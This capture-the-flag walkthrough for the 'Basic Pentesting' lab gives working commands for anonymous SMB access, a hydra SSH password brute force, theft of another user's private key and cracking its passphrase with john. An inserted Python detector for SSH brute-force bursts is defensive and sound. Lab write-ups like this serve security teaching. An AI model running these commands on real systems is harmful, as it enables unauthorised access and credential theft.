
Basic Pentesting

☕ 1 min read · ✍️ M4t35Z

This is a machine that allows you to practise web app hacking and privilege escalation.

Recon

Nmap

[screenshot: nmap scan output]
Open ports:

22 - ssh
80 - web (Apache httpd 2.4.18 ((Ubuntu)))
139 - smb
445 - smb
8009 - ajp13 (Apache Jserv (Protocol v1.3))
8080 - Apache Tomcat 9.0.7 default page

Web

[screenshot: web page on port 80]
Source:
[screenshot: page source]

Dirsearch

[screenshot: dirsearch output]
We found an interesting directory.

Enum4linux

[screenshot: enum4linux output]

  • Anonymous login on smb

Smb

smbclient \\\\$IP\\Anonymous

mget staff.txt

staff.txt gives us the two usernames!

SSH

Cracking ssh pw

hydra -t 4 -l <user> -P ~/tools/wordlists/rockyou.txt ssh://$IP

[screenshot: hydra output]
We got the password!
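The hydra step above shows up on the target as a burst of sshd "Failed password" lines followed by an "Accepted password" from the same source, which is exactly what a defender should alert on. The following is an added detection example, not part of the original write-up; the log excerpt, host name, user names and addresses are all constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log excerpt (syslog format); host, users and addresses are made up.
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 target sshd[1201]: Failed password for alice from 10.0.0.5 port 51000 ssh2
Mar 10 12:00:01 target sshd[1202]: Failed password for alice from 10.0.0.5 port 51001 ssh2
Mar 10 12:00:02 target sshd[1203]: Failed password for alice from 10.0.0.5 port 51002 ssh2
Mar 10 12:00:02 target sshd[1204]: Failed password for alice from 10.0.0.5 port 51003 ssh2
Mar 10 12:00:03 target sshd[1205]: Failed password for alice from 10.0.0.5 port 51004 ssh2
Mar 10 12:00:04 target sshd[1206]: Accepted password for alice from 10.0.0.5 port 51005 ssh2
Mar 10 12:30:00 target sshd[1300]: Failed password for bob from 10.0.0.9 port 40000 ssh2
"""
LINE_RE = re.compile(r"^(\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
                     r"(Failed|Accepted) (?:password|publickey) for (?:invalid user )?(\S+) from (\S+) port")

def detect_ssh_bruteforce(log_text, threshold=5, window_s=60):
    """Flag sources with >= threshold failures inside window_s; note an accepted login right after."""
    failures, accepts = defaultdict(list), defaultdict(list)  # ip -> [(timestamp, user)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S")  # syslog carries no year
        outcome, user, ip = m.group(2), m.group(3), m.group(4)
        (failures if outcome == "Failed" else accepts)[ip].append((ts, user))
    findings = []
    for ip, events in failures.items():
        events.sort()
        best, start = None, 0
        for end in range(len(events)):  # sliding window over the sorted failures
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, start, end)
        if best is None:
            continue
        count, start, end = best
        burst_end = events[end][0]  # an accepted login shortly after the burst means guessing likely worked
        success = any(0 <= (ts - burst_end).total_seconds() <= window_s
                      for ts, _ in accepts.get(ip, []))
        findings.append({"src": ip, "users": sorted({u for _, u in events[start:end + 1]}),
                         "failures": count, "success_after": success})
    return findings
```

Tune the threshold and window to the host's normal login rate; the single failure from 10.0.0.9 in the sample stays below it.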

Getting in

ssh <user>@$IP

Now grab the other user's key from /home/<user2>/.ssh/id_rsa.
We notice that this id_rsa is passphrase-protected, so we have to crack it!

Cracking the id_rsa

We use john here…

ssh2john id_rsa > hash
john --wordlist=rockyou.txt hash

We got the passphrase.

Now SSH in with the id_rsa plus the passphrase we cracked.

ssh -i id_rsa <user2>@$IP

Got the final flag from ~/pass.bak.
